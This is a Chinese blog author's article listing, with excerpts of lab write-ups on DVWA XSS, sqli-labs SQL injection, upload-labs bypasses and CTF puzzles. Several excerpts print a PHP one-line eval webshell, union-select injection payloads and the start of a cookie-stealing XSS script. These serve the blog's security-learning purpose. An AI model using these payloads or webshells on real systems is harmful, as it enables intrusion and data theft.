summcer-CSDN博客

原创 XSS反射型在DVWA靶场下详细实战演练

文章目录一、反射型1.等级为low1.1 在上篇文章，low等级的已经做过简单的Cookie示范，这里做一个补充。2.等级为medium2.1测试过滤方式2.2使用其他标签3.等级为high4.等级为impossible一、反射型1.等级为low1.1 在上篇文章，low等级的已经做过简单的Cookie示范，这里做一个补充。先建立文本D.jsvar img = new Image();img.src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/D

2022-03-19 20:48:58 3767

原创 XSS简易了解与测试

XSS提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录一：XSS是什么二、XSS包含类型以及攻击原理1：类型2：攻击原理2.1：反射型：2.2:存储型：2.3:DOM型：三、实战例子1.引入库2.读入数据总结一：XSS是什么XSS是跨站脚本攻击，它真正的缩写是CSS，但为了与层叠样式表CSS混淆，简称为XSS要了解到，他的原理就是它可以使得攻击者向网页中注入恶意代码，导致用户浏览器在加载网页，渲染HTML文档时会执行攻击者的恶意代码本文主要对XSS进行一个了解，以及

2022-03-15 21:43:47 2048

原创 http协议

一：http协议原理：HTTP是基于客户/服务器模式，且面向连接的。典型的HTTP事务处理有如下的过程分为四步：（1）客户与服务器建立连接首先客户机与服务器需要建立连接。只要单击某个超级链接，HTTP的工作就开始了。（2）客户向服务器提出请求建立连接后，客户机发送一个请求给服务器，请求方式的格式为：统一资源标识符（URL）、协议版本号，后边是MIME信息包括请求修饰符、客户机信息和可能的内容。（3）服务器接受请求，并根据请求返回相应的文件作为应答服务器接到请求后，给予相应的响应信息，其格式为一

2021-05-23 10:34:40 139

原创 wireshark的下载安装及使用

一：wireshark的下载官网为：https://www.wireshark.org/download.html二：在一步步下载之后最后到达：安装完毕。最后下载USBPcap最后下载完成后wireshark就可以使用了。三：1：wireshark功能介绍：wireshark能获取HTTP，也能获取HTTPS，但是不能解密HTTPS，所以wireshark看不懂HTTPS中的内容，总结，如果是处理HTTP,HTTPS 还是用Fiddler, 其他协议比如TCP,UDP 就用wiresha

2021-05-23 10:21:55 9587 2

原创 Miscx和Get_post

ctf.show:Miscx:下载文件后是一个rar文件，在打开misc1.zip后，有一个png图片和一个文件，文件需要密码。图片打开后是2020，假设是文件密码，输入后打开是一串音乐符，然后音乐符解密，解密后是rabbit加密，解密后出现，welcome_to_payhelp.其中在flag.txt和hint.txt中，都需要密码。将welcome_to_payhelp输入hint.txt后打开文件，出现一串base64加密，多次解密后出现如图：使用url解码，出现flag是hello

2021-04-25 17:17:24 167

原创 sql靶场1-4关

sql靶场：Less-01:使用?id=1’–+可以正常回显，查询列的时候，输入4错误，说明只有三列然后联合查询然后可以进行一系列爆破Less-02:首先还是用id查询：?id=1 and 1=1 正常回显?id=1’会报错，原因是单引号出现了奇数次，整形注入。用order by测试，发现有三列。并且?id=1 order by 4–+会报错。用union查询?id=-1 union select 1,2,3–+爆表：爆列爆数据Less-03:这一关开头是有点奇怪，输入*

2021-04-18 17:22:32 144

原创一点点简单题记录

刷题记录：攻防世界Misc1：掀桌子：这个是一串代码，要将16进制转换为10进制，然后，减去128后输出ascii这里可以使用脚本，利用python下的spyder进行运行。2：坚持60s这个打开后是一个jar小程序，让玩游戏，我太菜了，不会，很好，重命名为zip文件，然后文件夹里有一个PlaneGameFrame.class然后只解压这个就可以，拖到winhex里查找flag。然后进行base64解码就可以得到flag3：stegano这题老早就见过，图片的隐写加摩斯密码，复制全部文本

2021-04-10 21:46:36 112

原创 upload-labs-1-3

Pass-01:前端验证允许上传文件类型Jpg.png.gif使用了js脚本验证代码进行检测一：burpsuite剔除响应js：对于js前端验证，直接删除js代码之后就可以绕过js验证1.这里的remove all javascript会在响应之中会删除响应的js2.在burp开启remove all javascript之后在系统配置代理服务器3.4.5.然后打开proxy intercept,使intercept状态为on，这时打开你的upload-labs,但在这里我使用本地地址.

2021-04-03 22:02:21 124 1

原创图片写入一句话木马

图片制作一句话木马:1:选择一个图片用工具打开，winhex或者其他工具都可以，例如我选取一张图片用winhex打开，然后在其后写入一句话木马，在这里我的一句话木马是：<?php @eval($_POST['pass']);?>可以发现成功写入。将此文件上传入dvwa后，在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg此时dvwa出现/…/hackable/uploads/1.jpg succesf

2021-03-28 22:47:13 6415 3

原创一句话木马

一：一句话木马：标准代码形式：<?php @eval($_POST[‘attack’]) ?>eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式：php的一句话木马：<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。常见形式：php的一句话木马： <?php @eval(POST[‘attack’]表示从页面中获得attack这个参数值。常见形式：p

2021-03-27 14:49:08 21722

原创 2021网安第一次团队内小比赛

Misc:1:看你的刷新键是什么：这个主要是f5提示，然后是一个工具叫f5-steganography。f5-steganography工具运行必须要有Java环境，从根目录进入cmd后，输入java -Extracrt -文件名称.jpg -p 文件名。然后回车执行命令，出现output文件，打开查看后就出现flag2:easy题。在这个修改成zip格式后发现，需要密码，猜测是假加密，然后拖入winhex后查看文件类型，查看文件点，发现是伪加密，修改后正常打开，然后出现flag。3：看你们认不认真：

2021-03-23 19:56:12 168

原创 dvwa搭建

sal注入：当客户端提交的数据未作处理或转义直接带入数据库，就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。数据库类型：sql：oracle、MySQL、mssql、access、sqlite、postgersqlnosql：mongodb、redisdvwa搭建：下载小皮与dvwa，dvwa解压到www目录下，进入站点127.0.0.1。修改一个PHP文件后进入，在访问http://127.0.0.1/dvwa/setup.php的时候会报错，这时需要改ini配置以及进入

2021-03-14 12:36:28 224

qq_53065516的博客